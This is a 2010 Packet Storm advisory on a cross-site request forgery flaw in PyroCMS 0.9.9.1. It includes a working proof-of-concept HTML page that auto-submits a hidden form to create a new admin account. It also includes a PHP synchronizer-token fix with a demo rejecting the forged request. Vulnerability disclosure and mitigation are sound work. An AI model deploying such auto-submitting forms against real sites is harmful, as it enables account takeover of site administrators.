PyroCMS 0.9.9.1 Cross Site Request Forgery

2010-07-13T00:00:00
ID PACKETSTORM:91716
Type packetstorm
Reporter AutoSec Tools
Modified 2010-07-13T00:00:00

Description

                                        
                                            `<!------------------------------------------------------------------------  
# Software................PyroCMS 0.9.9.1  
# Vulnerability...........Cross-site Request Forgery  
# Download................http://pyrocms.com/  
# Release Date............7/11/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://cross-site-scripting.blogspot.com/  
# Email...................john.leitch5@gmail.com  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be  
# exploited to create a new admin.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">  
<input type="hidden" name="first_name" value="a" />  
<input type="hidden" name="last_name" value="a" />  
<input type="hidden" name="email" value="new_admin@x.com" />  
<input type="hidden" name="username" value="new_admin" />  
<input type="hidden" name="display_name" value="a" />  
<input type="hidden" name="group" value="admin" />  
<input type="hidden" name="active" value="1" />  
<input type="hidden" name="password" value="Password1" />  
<input type="hidden" name="confirm_password" value="Password1" />  
<input type="hidden" name="btnAction" value="save" />  
</form>  
</body>  
</html>  
`
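The root cause is that the admin form accepts any POST carrying the victim's session cookie. As an added illustration of the fix (example code, not from PyroCMS or the advisory author), the following synchronizer-token check rejects the forged POST above and accepts the same fields when sent from the real admin form; the helper names `csrf_token`, `csrf_field` and `csrf_valid` are hypothetical, and session and request data are passed in as plain arrays so it runs from the CLI.

```php
<?php
// Added example, not PyroCMS code: per-session synchronizer token plus an
// Origin/Referer check for a state-changing handler such as admin/users/create.

function csrf_token(array &$session): string {
    // Issue one unguessable token per session and embed it in every form.
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function csrf_field(array &$session): string {
    // Hidden input to place inside the legitimate admin form (HTML-escaped).
    $t = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $t . '" />';
}

function csrf_valid(array $session, array $post, array $server, string $site_origin): bool {
    // 1. The POST must carry the session's token; compare in constant time.
    $sent = $post['csrf_token'] ?? '';
    if (!isset($session['csrf_token']) || !is_string($sent)
        || !hash_equals($session['csrf_token'], $sent)) {
        return false;
    }
    // 2. Defence in depth: if the browser sent Origin (or Referer), it must be ours.
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? null;
    if ($origin !== null && $origin !== $site_origin
        && strpos($origin, $site_origin . '/') !== 0) {
        return false;
    }
    return true;
}

// --- Demo: replay the advisory's forged POST, then a legitimate one (constructed data) ---
$site = 'http://localhost';
$session = [];
csrf_token($session);                      // victim is logged in, token issued

// Forged request from a third-party page: no token, foreign Origin.
$forged = ['first_name' => 'a', 'username' => 'new_admin', 'group' => 'admin'];
$forgedSrv = ['HTTP_ORIGIN' => 'http://attacker.example'];
echo 'forged POST:     ', csrf_valid($session, $forged, $forgedSrv, $site) ? 'accepted' : 'rejected', PHP_EOL;

// Same fields submitted from the real admin form, which included csrf_field().
$legit = $forged + ['csrf_token' => $session['csrf_token']];
$legitSrv = ['HTTP_ORIGIN' => 'http://localhost'];
echo 'legitimate POST: ', csrf_valid($session, $legit, $legitSrv, $site) ? 'accepted' : 'rejected', PHP_EOL;
```

The token must be bound to the authenticated session and regenerated on login; checking Origin alone is weaker because older browsers omit it on some form posts.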